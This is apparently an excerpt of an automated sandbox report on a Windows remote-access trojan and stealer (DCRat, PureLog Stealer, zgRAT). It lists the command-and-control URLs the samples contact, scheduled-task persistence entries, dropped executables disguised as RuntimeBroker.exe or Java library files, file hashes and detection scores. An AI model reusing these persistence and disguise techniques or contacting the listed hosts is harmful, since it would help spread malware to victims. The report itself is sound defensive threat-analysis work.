                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target Agentcomponentbrokermonitordhcp.exe, PID 7384 because it is empty
                                                                                                            • Execution Graph export aborted for target aXnWbWpBWYJmkhPMHrrUNM.exe, PID 7420 because it is empty
                                                                                                            • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            09:02:10API Interceptor12301732x Sleep call for process: aXnWbWpBWYJmkhPMHrrUNM.exe modified
                                                                                                            14:02:03Task SchedulerRun new task: Agentcomponentbrokermonitordhcp path: "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe"
                                                                                                            14:02:03Task SchedulerRun new task: AgentcomponentbrokermonitordhcpA path: "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe"
                                                                                                            14:02:03Task SchedulerRun new task: aXnWbWpBWYJmkhPMHrrUNM path: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                            14:02:03Task SchedulerRun new task: aXnWbWpBWYJmkhPMHrrUNMa path: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                            14:02:03Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
                                                                                                            14:02:03Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            104.21.38.84YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 250345cm.renyash.ru/sqltemp.php
                                                                                                            U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                            ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                                                            67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                                                            gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            891781cm.renyash.ruU1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.38.84

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.38.84
                                                                                                            https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.24.14
                                                                                                            http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.13.60
                                                                                                            https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.64.1
                                                                                                            6a7e35.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.32.1
                                                                                                            http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81Get hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1Get hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.20.99.10

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exeU1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeU1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeU1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\lib\0c86d0c066c784

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with very long lines (804), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):804
                                                                                                                  Entropy (8bit):5.885713261616762
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:u2OqsfaYVLxJNKgBC7UNs+1xOY3Q6JMk8ia/zFxauDpssVrLpxUc+fXXaPWZqU:uhVLx1C7kd113Qpkm7VGsVr4fHwbU
                                                                                                                  MD5:075D0FC2B7DDDE25712884CCE17E02E7
                                                                                                                  SHA1:9241444DB70E1D1C2A37907892FE8B8C44FE0E0E
                                                                                                                  SHA-256:E69A80D749C63D83317A73328748D6E14480AC1B9D4963D3F3D98717FD8BEC1A
                                                                                                                  SHA-512:C894BAADB3EE0C402F63C388DAF12D618E4DAB6F92F25E81B1626C29FD109A009AB4D769B93B28791F4D78C9C69CBB5B104F3B613620B4745AD04C10CAAF1187
                                                                                                                  Malicious:false
                                                                                                                  Preview:XvMTRyZjlbWkkvX46i64KXdbz02Lj0O18edZFvSjdqmdDu9nVVlnMymARudb6NAvNelGS8zLPXaevAXF0O0OOkpK1cHUR1mQq0QjJ3VXgaYyYIPRXXkrXvgmybPz1e3YuJy4ty673cryM0vtMz74Q524UourofgBh9EOTViibny4DrZ8pfnBh9IzR3jFEOTX6qQNwhZ0RYcnG70mPvCI2eei1P7awceMTb8XbMLHGwtIgesTD60SLLfbMsVhk9Ey4PUp9cLCk4BFuVCXhnW0mLAH5gLt0ohHs5OQKCTkuxsRKar0q896mNMtPMudRcM5X3WzHvMeUwFzct7fyUC2okfetfB8SzTRkx3QD1t4vfm0HWQfOOo6ZUQxY2GluOMecyOp0rc6lIGJ7oXWOftDKW2QgG1LvHKhSHXTIkphwrVROHztetXOfJTG68JtzRKd8i00RDOo0LQcBkCZRHqCu5CJyRXJb5rfh1SpQ9cbetXT20EV5ucskItCgrBAqEM5du5KSWISpOhBhsQ7MCOrd94YIPIi7bvagczI43DjlKCWksfxbExn0fbdzhCCNjUNdHeE2ICT9oFS7ixZuVH3nHjBAWSX1BVCzy2dNa5TBeoLZJgRtmR2bbjVhdDg0pc8TDdIpUMTZy1JdYl1zAoOtckXOh5tXYdWBq2WpXlYZ7dnja2J1LqzANO0dF3IYc6AVfHxgPMbZPyv96yyow2LsnVybB2kdcA7BcRESFmm9PZvZc1gRFdlkvSrJTVfWl77P1uhotfjJQLcOkZ9JWSY8YWPJk59tHPXRcfh

                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\9e8d7a4ca61bd9

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with very long lines (883), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):883
                                                                                                                  Entropy (8bit):5.914184037501613
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:/5zm2egx93BULbHYwOCjfv4sW9Zzslyvcqx8SlAb+:lm89KLkCgsWzI8EqZlV
                                                                                                                  MD5:E2D4A4BA97C55C2590E20772BB73B192
                                                                                                                  SHA1:AD62164F9F4CB4B6E8567470CC9601737BD44EF2
                                                                                                                  SHA-256:2C79D4696280E5441EB9B07B64043A8996BD7C16EB26218C7DE9E780F46180E6
                                                                                                                  SHA-512:AEAEEDCBCF1250EE2DEE8189C43E71AEA35B84E270F3150EF757EBBA15A9882FEF45DD98298AFC1E63382870E7FF62E922404D5414CE26998C3CA76599308B41
                                                                                                                  Malicious:false
                                                                                                                  Preview:ZraKdwjq7V3rnc70UuhDEydjMuUmpWRWpwNoVY3t99BG1dW1bfXfPzykO18sb6AlEgB1OTf50xDExWrtYcKJ8vGz8naeaKSC8aCUbfnIAcocwtx1JOU8w0mSaM3l2BfqfAFXUWS3zCJgHnDOziUL0UQIxt4PlBP9686vnagw6bIurGKwJowTqT0Ku7jkcCRxwJjIrRlZChPYLgarjHG6P5SnIwBp16U3JU7hgBF2DXRIDb8Nh1BV6Vi006A4P5hGNWP1i2LhBO22oKjqxyI9486ywHqkBLmIzL5rMHpoqdUscqMqWTGbwiLOZaFaMkg0luDcO2eqIdSaoOWG49NrELVQAqSvBOcG7eHrmtceyaSSPukLE9gMXzvZYwchkto3BMdKGodLht2n2CAPGGqCsPtIssS0R44FvZRDRaEZfUon6IgVvNbdClLvdUbYVm3nzw1dv78pBRhXkFLkL6EEcbCKOfk68qD3bByJQCkyOwbvExKYJ1MYhzKYurPQXBrVNo6jRBUJWQzq9RFaUMwGepVl0aZiwTbMEFia0lGHhDCRAeYcmz5LPk1iSVs0lvWCzml3spjsFojamDlWB667YQ7eOAHf3Qfvq9cX3eu6PMFkAa5PuWypzYojoGpshEzyIxunlNdhM9sLKXdyF2vgb06SU2swzBZKWRbNqRng2RczpdZRn0npSTXS1bSsersKkhy36QIxPPnJYGm1dbJ8Yu2D3JWO94BLiRPIofVWrzZDpN3uyaODitw0pu9x43xUNblH1eM7GwQiUzYpPlajp8nzfYc4ghbyCF0Nmw3TNQ7vcNg0VUhTdOoOyvlcCSbiUcgO9LCdsGVYA2WR2miLAIUxalZ0KaR5zYaArR1KREkX3PO5ZUk

                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                  C:\Recovery\0c86d0c066c784

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):153
                                                                                                                  Entropy (8bit):5.704210212554569
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:2T3AYP7RCGn80ofCZiqFD8VZ8d/EDUC0gfQ/DpHj/r0XMFEBKbdE:2c280ociq5/cD0tDUwG
                                                                                                                  MD5:492ADA87AD56F09D8C3BD3D64E4C582A
                                                                                                                  SHA1:21CB071195A2675730CD1564FF04AA21F4B28CC0
                                                                                                                  SHA-256:4838D857F3E2603134FB5416EA3493C121492B895405693357D4CD172E3A8B29
                                                                                                                  SHA-512:4C52194EAC1ED8140AFA2648277333031C26DA4FC9BF018BA0DF58F31980C4EF20C871EE746833D5E13DB5784E43E6738697DE1B9E522FB4A8C4936ED2393ED7
                                                                                                                  Malicious:false
                                                                                                                  Preview:gBynEUCDuEeefIYjhPmimFyAhKd3sgpT3pRtFoYGsuwDoRvqeyZTMzgaMyG40JVOZLlz0pe20fz1TvVPYxZ4GVGDI1gQiePjZiodq5zyTgcq9oHbd0fDtbHDEhr9INUWQQcuG1ic7kkk3aDdtExr8Lz8a

                                                                                                                  C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                  C:\Users\Default\0c86d0c066c784

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):102
                                                                                                                  Entropy (8bit):5.604838547955997
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:/oJ3hPFdQBD2no6EQgUkEaJnuVmQCNrD2xiPRh:AJFFdYKiwVfUh
                                                                                                                  MD5:DAC7A6FB35F39A9C6540CFE41703C204
                                                                                                                  SHA1:63DD1D81F1E423EAE347E768310CE255563A7287
                                                                                                                  SHA-256:0A74E08820F05437F913DFCC6BE05D2E824054CC338AC1830330DEDD272E74FE
                                                                                                                  SHA-512:5F277756FA4EFE8E913C93E1BDAB0122FC654D52AA90FD80E1C41E84E9D0ABB13DA8010D3CC66B94A4E3E0EA27F3404FBAD73209996AC85F846283271533E6A0
                                                                                                                  Malicious:false
                                                                                                                  Preview:asMWUlRDGI0hKodNPDamYEbeUgcZOG4eXx9URXuLa5EqH3avpAlmpkrVRsCyJ2yANWJXoI62TOMd9uWaFquNfSzxGoDjU5BhGEcvtD

                                                                                                                  C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Agentcomponentbrokermonitordhcp.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1396
                                                                                                                  Entropy (8bit):5.350961817021757
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aXnWbWpBWYJmkhPMHrrUNM.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
